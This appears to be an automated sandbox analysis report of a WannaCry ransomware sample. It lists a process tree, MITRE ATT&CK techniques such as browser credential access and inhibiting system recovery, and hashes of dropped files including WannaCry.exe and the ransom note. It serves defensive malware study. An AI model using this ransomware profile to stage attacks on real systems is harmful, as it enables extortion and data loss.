  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=5308,i,4469143170735003977,6739462727402697991,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5700 /prefetch:1
  2⤵
  PID:4452
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1124,i,4469143170735003977,6739462727402697991,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5192 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1852

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1880

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4820

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:4508

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
PID:3532
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffff2e0cc40,0x7ffff2e0cc4c,0x7ffff2e0cc58
  2⤵
  PID:2140

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Filesize
64KB

MD5
b5ad5caaaee00cb8cf445427975ae66c

SHA1
dcde6527290a326e048f9c3a85280d3fa71e1e22

SHA256
b6409b9d55ce242ff022f7a2d86ae8eff873daabf3a0506031712b8baa6197b8

SHA512
92f7fbbcbbea769b1af6dd7e75577be3eb8bb4a4a6f8a9288d6da4014e1ea309ee649a7b089be09ba27866e175ab6f6a912413256d7e13eaf60f6f30e492ce7f

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

Filesize
1008B

MD5
d222b77a61527f2c177b0869e7babc24

SHA1
3f23acb984307a4aeba41ebbb70439c97ad1f268

SHA256
80dc3ffa698e4ff2e916f97983b5eae79470203e91cb684c5ccd4ff1a465d747

SHA512
d17d836ea77aeaff4cd01f9c7523345167a4a6bc62528aac74acde12679f48079d75d159e9cea2e614da50e83c2dcd92c374c899ea6c4fe8e5513d9bf06c01ff

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
355a34426afd246dae98ee75b90b79c2

SHA1
3011156636ac09b2665b8521d662f391c906e912

SHA256
f073bb41e3fb1650fdaa5ab3a2fe7f3db91f53b9457d65d58eb29bcc853d58e0

SHA512
e848fd8ff071e49f584c9cf27c4c6b3bddc522e18ce636fce5802fcc1da8c36c90d331ae5097b60e795f0f967141b2c4293d39632e10334cba3fdc0f9cd1bc34

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
19e5285c2f2b5d014971130b91636884

SHA1
0a7f6f4f9e82b503bbfb6d2c7a6bb1228d4520ae

SHA256
e9a90b593ebe3695356acfb09eda22f150559b6501f89a8c74079647454a9640

SHA512
fe7679454bee797a10565ed729534ee8ce65c2e014b3d7325659c445cc30350ebeb70cc980c0934fec5c651f6644eae68f38559a627b791b3e1bd29fd79c17df

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000006

Filesize
72KB

MD5
bf168b8ee29e8a9290aa60752a429516

SHA1
ad7b51c81f8045fdee9943fa4c23e14e6d0ba110

SHA256
11da5080b2b7bb2780e0db5bfa8015d08abb07c9c0e79d9bc6b3cc016302b96c

SHA512
7fa69369757f27bb5c7fb668ac9317a9cd460b701823b88d7a71e3ce8265fb8ac55a12d0e6cbdfe5d6871917220593aa0953f6ea8697bd65e6afdfbbdd38e57a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000026

Filesize
414KB

MD5
cbdb5566f6b2d79efbcfeacf792ed8aa

SHA1
2da05775df299fe7a1165f35f882039e7389cfd7

SHA256
f3ca0d074fb841f779b2f29555f57f5fe623bc5491157b93b0b4ed2de2cf27ee

SHA512
036cab84163a6e766d58493562c0463b879237e5c6c723bf74654059801c6b7c2de0e53076049637fed04a0c5bc2cad075a8f3221a4db5ffe5ac4653ba3fb49c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
e1b8dd2076afd94291622820e9b984ef

SHA1
5f37a6dc7781cd286cff4a73a1ef6eba3bf475be

SHA256
80fb87cb99b112999546eaf1cf609d50f9a2d51786095725d36c3428239df69c

SHA512
5b51c765868626313fef2717cda01eb8d0883d2a5f08ce89cb492dd57147207a43ae4e9f987aa348202685331e635b710db4b3881006b2d5434a273b96d160c9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
34e6c3fab3053042643bcdbc53feba3b

SHA1
e42d2077939ccc0c84fa72adcf9cfc281012a1db

SHA256
4e2ea70156be4c185bda7f5bcecd602ac718678683aa725409e8f5d5809247d8

SHA512
b78bbb762851ce18724e844e4a7df7f213a3b3fcc297dda952e552201726b8269a9dbbbc6bf2c2fe2de61e57088651114d222652f785b4cf3a65cab21f0778f3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
7KB

MD5
40e1786e3ca481f70ac7934115d004f1

SHA1
069c0528359d671bba4f89f378f42fae4d0863ad

SHA256
a64e13cd41afcc55aad91465e9a0109af769f2b79177d06554564c3b50fe32f0

SHA512
bb74ec568953bce82706306f7bd5c1a9efc85a0c2e93c3ffa88f375f004de91b028f643c0d37bff2fe818614f8d9d5a61101a8b272b688abe011017cb968e34e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
5KB

MD5
f56572e78b46033a22e5346a334e15ed

SHA1
da2b473426c461d2bf14bc127326413cc414a1a4

SHA256
3285acc9aa14c38322d4e8bd9ba967c5bb8ba287ada546ae141797defd540e24

SHA512
5c13fc4265e60300cdc467e847dd06c88a0f2e63cdb2ccd282bf6a0f6833ff43d910946e5edcfada5b02661211e6990987271c4641cd9b572ceadbacffe3d983

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
66b8a9882bb5273c12d602a810c7d665

SHA1
10345fe4ddb6651b74dddc773fcf8fa4f4ca7465

SHA256
1357c14b45225722c14df825fe69ce70fff325b835cfdc2508b7519580f6a0da

SHA512
6f86b21b55c3bb13e44314f9ae35aa7da8c67c66d10152cead9d7ec55117034a5417904a52639b5157bde1d815743459a9469eef8cea0705a464b4ae46c5e341

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
5cbcabaa15641542533760fd68e066d5

SHA1
490be0937a072e20c10e70e2c556e3f93a9a37af

SHA256
f43dd76436d6859c1a4537c2771431880362c2224c9706ccc2c270904a1c9a30

SHA512
b0d9686132b01aee62e98aa8e924304e823ee3c36271cda976d58f37c17a10d623a07e06ee203a3ac84c72151e88a533f563a33fc536835f85806bf9b3d59d99

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
b5ddd70c154fe896b9394c78fceea821

SHA1
37dd7bf97fe417d83f979a46eedc59471257f95f

SHA256
1d065b3b6906051c537b3a28698306245621ab70c1740cb95d180f39fce3d7cf

SHA512
6c5729b55bdbc8f22fc943785483f8595808f1cba03e12106b7dbbffaeaa4cf84918c7175e615872a5470a24c42646bb2367456e0095886c95bcd53c9eb54b20

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
fac39eb0d644078b1b68485dd9328367

SHA1
ae6091966aea0d792615984aa273e51ff834eca3

SHA256
3595c1fd8af228ba34adda84f1e50f2f9b9d52afd4dbfd25350c055dd16f2383

SHA512
723f36e0d81d4862105f270dc97137aa2c219dd4d60eee7c078f9b28c7abb31ab8be962e0067246040d361a9be7a1847de1f147f0abd71b5594d520ca0419ae0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
0c8ea682c83451aee8cb8a999cf0875a

SHA1
3efe3869a8e5ae6df64a19bd047be14421aaee5c

SHA256
90f76e51151a7e85566f467bb3d207452cabff46675878d65bf7a3ec342bd1d9

SHA512
b0799a4363f949a47ef322bb37b0e49d3a806f991050b5cc6b7a04a9438c6529e6aaf3c91774007f8653e3ea6256b714d71a297337121e6801fe1c9ee712ba36

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
721c533a97ac61bf566c0dbfecf0bcb2

SHA1
a4684449effa06ef688fc0bd501897dbd6682195

SHA256
e816d62ed706162b9de6c1ca548779045a82c54ba1d53c25340767da1e9d6cce

SHA512
87e3ec6a199697b03390f3a14c882ba18d30672f351ddc43d7ab5ab0d3a31c5b0a6ad7ce4207d29525b7383c74c02e0ced4ebe1efdcdd9af3d9e49e379bc6597

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
7d1aee69fc7b48ae493274b6cd666898

SHA1
d731aa36b548f5bd14dd4d7230b1981cf9e45fa5

SHA256
ce713027156fe28dd492d946cbfa3a077c3b1d10d0022072f8a05ae6c2b72361

SHA512
964bdb4837e729eccfeb578745a0560b9ae97eb4ac11847db092e7814bfaf0293c0064d4b7fec491826f6795bd13e273cf7fb26635447c5cc49967b573520e28

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
9b62a28e08a2265c84b3c143fe1b2af9

SHA1
4b1f2b29bcd1dd2d3a4b2fddc0662f825994e746

SHA256
25d17d94591d149a932fd2bf1e469806292534808c76c763375bd15986ab3682

SHA512
f694540f2147ebe50cfd968a98998a51dd09bd10db46e01b5661ca905aa562eabe3891fe2be47be6ddfa7a16efc9e4e26cb9218460e548da6fd2e83421dc147e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
ab7614c012ef7410831f6a7f17a52dcb

SHA1
1fae866dc0d81764dc3e2508625515da2069691d

SHA256
95231da27c25353bfdb5c8e0cb13e7637639af6f9d0fc29f31080619253a8be6

SHA512
63cbd434e8dc5cb9f7b3b639bee21ba4cc3950d55743c0b88047963378745d53e942dab3da534fa879b5ab3ea15b9678decdef3a90afdfbfe0065858d53f96f3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
cf4568e10c23c071991f6e2f42adce87

SHA1
7d3fdaa5a4a6ad2076f8da65a2b094a934e92529

SHA256
b377cc53fefc0701c1f44b79937ea5a4da334864133b2ede2218fcb67c1f81ab

SHA512
954b725b5202a17cca3106382883f0b6753df6e33c6dbae5158f0f0a8e4143bffb50d9baa89940b72386542aa0baf3fd674370493749458980b49e74735d0f3a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
5571860c6f01a284a2450a3f914ebe8c

SHA1
836adb7547bef15e78d8b9e5f5c7915b552a3571

SHA256
e1969734a9def2efe0d16bcce18c17ff873364a25585c13274f22e9e40b83a2f

SHA512
1a454414fc2286167ed9b230b92d7a4c85adcf54bf2991a2a17345e922aa650fd9959160dc1660344b3995571d5a3272a4a52eded9d866d334600c4e54e3a8dc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
c84b6b6fe7a2f0542df7abe05c01fb42

SHA1
e143e530619b918940fb95980d63231cbe84c42f

SHA256
59c7339a879c00beaa8e9b229ae0c8a8c6a11ce73e6809d9005ecc5c6b2d3b18

SHA512
d4e7e5bfcd5a03fdf60e864f8e990c6c4a58b8b2601f8e8b34482924fbefb0fc12bcce12a42f2763d0649bb38dbf85f654464b29e8586945aaecf958bd3b2fbd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
f72cd64dd88ab28b362b77bb233e114e

SHA1
074b2602b31de5e074d45afa1a30ab09081155b2

SHA256
2ab4c006f3942d13da84e9acd265183cb81f8cfddd8832cd0a47ab4f96b41889

SHA512
19aca11e059970784c47f58e50f94819e5cc57158e359b118d3412741e70b3d0b5cae5705a2cc534bc8e63eb83f0edc52aef44b0750727191a04b51e3caa29c8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
a89395c8b8e17ee8208268f4e9379d0f

SHA1
f71ae7176a2bedfa06c77fa7dd4e84113358c962

SHA256
a8c744ad5f9b42859399bde84e76d1d71116c181b7d987c1d3c60f639eafb391

SHA512
62f2eb3ad187cee8f6e8b73318e7913da7646a7fde2b51a0b77dbf59a32dfacd62a8ae5d36e641eaf9792bf5bb691d23bac22c3a81dbb622ac1bbad0aac52ab7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
9737a95a559f05f4c909a5cd9bfff8ba

SHA1
dd6adb2fbd728d87b01ca11e1e0a1f9939436de2

SHA256
7f0676a95a9ca6e3644125258f717e7093a22cdb540688b84f177ec4778c94a8

SHA512
b7a0e496f056051407835ff5813c446d303cf25f730600715639d71c2978cb00fa3d8888d78e17b6a1436c2df8cf303e9a9f61f83f2fab73e48ef041b74402ce

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
ceda6c4f867865ffe79bcf669fa488a2

SHA1
2f85a2cf956f01c6dd5001d3bdedbd7c8fa0cb63

SHA256
641ead3fa7c88cb59d96beaa1f8306406cd2666ebcf2350028fd94bceda64ebb

SHA512
372e72657c54c3f0744128c372bb1ade07c90794f888fb8032b51b292920e3ab9c3a37c776ad04a92433e3b78419de7f16f570e71227e07fb485aded28bae191

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
13KB

MD5
df2f1f8af0ff879708ae762548f76b33

SHA1
521162e6e4c1fcf10e226af35572e0676c56c754

SHA256
df1d072677556ca5194b5b27b38ae03fa9692051509bf2cf7b49d69a8400e912

SHA512
d9914fad5ad767de92ce60162b638cfc2d1efa6025854fdf4d6c2b270d6146dad71ac8035619bbe7752746df1f904a44457f402ea7a420d946ba93464c7b4ce2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
212KB

MD5
5ee369a31a1a5d6982e1c9dcaffd27f5

SHA1
8019db934de0af10dd41c5e4f0eb1e666eded6c9

SHA256
ef9e3351c582b34cc951e15497962599ea7fab70491a76179ebb2a6ce382cc72

SHA512
946f1f43eb48f6b2f18ae5e848fae0f72ecefd2c14766a58b44e75e53c03269949df5b0cb69bc55264ba9a8ece82f7c9fa7bc8bdeb77fbd1a33acde661a073b5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
212KB

MD5
d63e56ed864e9fb025e0eed34f2b21ff

SHA1
cb4c8dfb9c46bf851c3636533adc610aac4c71ff

SHA256
586d9298b4e79cfafdc9745e881782e7e9c3492a19d9482b266fb356c54af178

SHA512
b8a943f32ddfd0ffff58903a321aa80b574388900b9646f6e74d284e327f351114b3f10503947c949041c0c315ed487712a229493a35a3a2cbd2de942559c70c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
212KB

MD5
2b73a57c8242d6fa35e0455082b94e55

SHA1
0e14bb8eb9878a1afc41977cf130ded8e335e612

SHA256
f1d7ed691d16853ab1aa10927dc6757728ec8da89fba3ff10e0e0f8ef77f6ab0

SHA512
264725d084d8cea0b66e54abb0d46c482247bd3383f0037202165a0d2dc7e218178d57a2f3a51a3a1b5dc364f8f82e91a71a3fc1c3fc4bbdca9489dd71d8ed79

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\first_party_sets.db

Filesize
48KB

MD5
5a1706ef2fb06594e5ec3a3f15fb89e2

SHA1
983042bba239018b3dced4b56491a90d38ba084a

SHA256
87d62d8837ef9e6ab288f75f207ffa761e90a626a115a0b811ae6357bb7a59dd

SHA512
c56a8b94d62b12af6bd86f392faa7c3b9f257bd2fad69c5fa2d5e6345640fe4576fac629ed070b65ebce237759d30da0c0a62a8a21a0b5ef6b09581d91d0aa16

Download Submit
C:\Users\Admin\Downloads\!Please Read Me!.txt

Filesize
797B

MD5
afa18cf4aa2660392111763fb93a8c3d

SHA1
c219a3654a5f41ce535a09f2a188a464c3f5baf5

SHA256
227082c719fd4394c1f2311a0877d8a302c5b092bcc49f853a5cf3d2945f42b0

SHA512
4161f250d59b7d4d4a6c4f16639d66d21b2a9606de956d22ec00bedb006643fedbbb8e4cde9f6c0c977285918648314883ca91f3442d1125593bf2605f2d5c6b

Download Submit
C:\Users\Admin\Downloads\!WannaDecryptor!.exe.lnk

Filesize
590B

MD5
1a24916c9e7bb2665442a8a857fbb220

SHA1
633ff6439fedc9f2792b5c22fd51e1441ff4e3cb

SHA256
635eff1931eeee55685a4e17768392ed4b0c6b212125aae961fa33c9f0a722de

SHA512
2c8e57a083d01a42a479dff53ddc16a64f6411f21c49b374e0617f0e1208f7b470845fcd818a4fad5520456219538344435e39b53b7085790d12ad2c84aeca45

Download Submit
C:\Users\Admin\Downloads\00000000.eky

Filesize
1KB

MD5
c6c7b50e0f045a8a8367a9723849a3f5

SHA1
cc449be4fcfb3a22650252989f1de8352f55e401

SHA256
56aa212a4ae018fe4685f6d24c8ae93c9665f3a33ea149d622ecce56b460d948

SHA512
2305bb9ef15c81ecfca82b12b63fee48d3ede9f436b6413eb6679bee12242971067b1d6a221fe15ed2023b9fe363348f58a88929ceb7cad09cbe42cfc9c01797

Download Submit
C:\Users\Admin\Downloads\00000000.res

Filesize
136B

MD5
8e6668d72567d22fb8052ddc2036e68d

SHA1
480af5c1d1bb8927e99348e86233c8bb4c09dcd7

SHA256
7e9e27dabefd17aa15101be1e6c13b53abfad9acbcead6d9da48fc9999ae97e3

SHA512
d439c6d9cdf06eb836f79d4c76bca1143e00284b5a66598bcce4305723ca0b5dce3ad7c8ea1f5fc092f0455ff95025b8d548a3a231bab63c74f20f8220ce9e16

Download Submit
C:\Users\Admin\Downloads\00000000.res

Filesize
136B

MD5
767d8b796dd6d257e840893bde614b81

SHA1
7d1e575a961281d43a8e95adc9bd82973fa591e4

SHA256
19f4d8766e75ad0507b9fa901f2546dd5b4985d29250a79c58ce5817cb712b3c

SHA512
0da497654fe3ee5adb4361efee0600a2b67a5f4c08f5a214083dbeadcb37b492618c2aa2cc8ce2f9ad84d2499e2b4a4b8d332a04e233324432c52088c2624691

Download Submit
C:\Users\Admin\Downloads\00000000.res

Filesize
136B

MD5
b3ecf80b4c12288fe4e9d65449e1f50e

SHA1
f168a78da48b829b9d23a61280c62e7b8430420f

SHA256
eb516cb640b5dbae5067b7767fdb67b5266c1deea6e51aabf1fa1747baabbe47

SHA512
a0e0661d5ed868e97aa9e11768f22d4fbfe97f8da300cb85a0f1228c672c9dd5481e81d02d948928c03181936014ab49f27726f7ab8151561949c6b794cdb074

Download Submit
C:\Users\Admin\Downloads\00000000.res

Filesize
136B

MD5
846f5a4750b6d9a12b0b8c8451c064ae

SHA1
2a88776d3456b74df8f36e44383183a08fcc31a4

SHA256
0eb241a1a0d37a706d57f4b68083602b43656857a92dc8bb96eedecdd805e43e

SHA512
c804503f8cdf1872beaa30bf7cf9d2f8686719e2ccaf3cfa63e2dafac1351c09f0b9b2f82baf5ae7c943f57acc90be3a3ecc1e10fe2a9be8365347ed6b8144c0

Download Submit
C:\Users\Admin\Downloads\54781727469347.bat

Filesize
318B

MD5
a261428b490a45438c0d55781a9c6e75

SHA1
e9eefce11cefcbb7e5168bfb8de8a3c3ac45c41e

SHA256
4288d655b7de7537d7ea13fdeb1ba19760bcaf04384cd68619d9e5edb5e31f44

SHA512
304887938520ffcc6966da83596ccc8688b7eace9572982c224f3fb9c59e6fb2dcaa021a19d2aae47346e954c0d0d8145c723b7143dece11ac7261dc41ba3d40

Download Submit
C:\Users\Admin\Downloads\WannaCry.exe

Filesize
224KB

MD5
5c7fb0927db37372da25f270708103a2

SHA1
120ed9279d85cbfa56e5b7779ffa7162074f7a29

SHA256
be22645c61949ad6a077373a7d6cd85e3fae44315632f161adc4c99d5a8e6844

SHA512
a15f97fad744ccf5f620e5aabb81f48507327b898a9aa4287051464019e0f89224c484e9691812e166471af9beaddcfc3deb2ba878658761f4800663beef7206

Download Submit
C:\Users\Admin\Downloads\WannaCry.exe:Zone.Identifier

Filesize
55B

MD5
0f98a5550abe0fb880568b1480c96a1c

SHA1
d2ce9f7057b201d31f79f3aee2225d89f36be07d

SHA256
2dfb5f4b33e4cf8237b732c02b1f2b1192ffe4b83114bcf821f489bbf48c6aa1

SHA512
dbc1150d831950684ab37407defac0177b7583da0fe13ee8f8eeb65e8b05d23b357722246888189b4681b97507a4262ece96a1c458c4427a9a41d8ea8d11a2f6

Download Submit
C:\Users\Admin\Downloads\c.vbs

Filesize
201B

MD5
02b937ceef5da308c5689fcdb3fb12e9

SHA1
fa5490ea513c1b0ee01038c18cb641a51f459507

SHA256
5d57b86aeb52be824875008a6444daf919717408ec45aff4640b5e64610666f1

SHA512
843eeae13ac5fdc216b14e40534543c283ecb2b6c31503aba2d25ddd215df19105892e43cf618848742de9c13687d21e8c834eff3f2b69a26df2509a6f992653

Download Submit
C:\Users\Admin\Downloads\c.wry

Filesize
628B

MD5
f702f08f0a066e564427559887976078

SHA1
cde2bca2cc9c679177965eac897f1cfc305b1043

SHA256
f8f4ffb0868018fb24efa82b98b6cc98aa2010cd673718a544178e5b5460b001

SHA512
4537389abc88775a302914f57ce72c638bdcf645b6ae81a1036b433b537a362b4340cb807fc4e4a0f352f343bc2801302f00eb27ae31c2403fadfc2d482eb9a0

Download Submit
C:\Users\Admin\Downloads\m.wry

Filesize
42KB

MD5
980b08bac152aff3f9b0136b616affa5

SHA1
2a9c9601ea038f790cc29379c79407356a3d25a3

SHA256
402046ada270528c9ac38bbfa0152836fe30fb8e12192354e53b8397421430d9

SHA512
100cda1f795781042b012498afd783fd6ff03b0068dbd07b2c2e163cd95e6c6e00755ce16b02b017693c9febc149ed02df9df9b607e2b9cca4b07e5bd420f496

Download Submit
C:\Users\Admin\Downloads\u.wry

Filesize
236KB

MD5
cf1416074cd7791ab80a18f9e7e219d9

SHA1
276d2ec82c518d887a8a3608e51c56fa28716ded

SHA256
78e3f87f31688355c0f398317b2d87d803bd87ee3656c5a7c80f0561ec8606df

SHA512
0bb0843a90edacaf1407e6a7273a9fbb896701635e4d9467392b7350ad25a1bec0c1ceef36737b4af5e5841936f4891436eded0533aa3d74c9a54efa42f024c5

Download Submit
memory/4580-391-0x0000000010000000-0x0000000010012000-memory.dmp

Filesize
72KB

Download